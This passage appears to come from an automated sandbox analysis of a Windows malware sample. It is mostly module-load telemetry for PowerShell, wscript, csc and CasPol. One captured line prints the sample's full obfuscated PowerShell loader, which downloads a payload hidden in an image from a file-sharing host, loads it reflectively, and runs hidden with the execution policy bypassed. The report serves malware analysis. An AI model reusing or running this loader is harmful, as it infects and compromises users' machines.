                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1302780296.00000000034A8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000010.00000002.1715001566.0000000006DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: q;C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.pdb source: powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1310602122.0000000008B14000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000010.00000002.1715001566.0000000006DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Found suspicious powershell code related to unpacking or dynamic code loading
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                    Obfuscated command line found
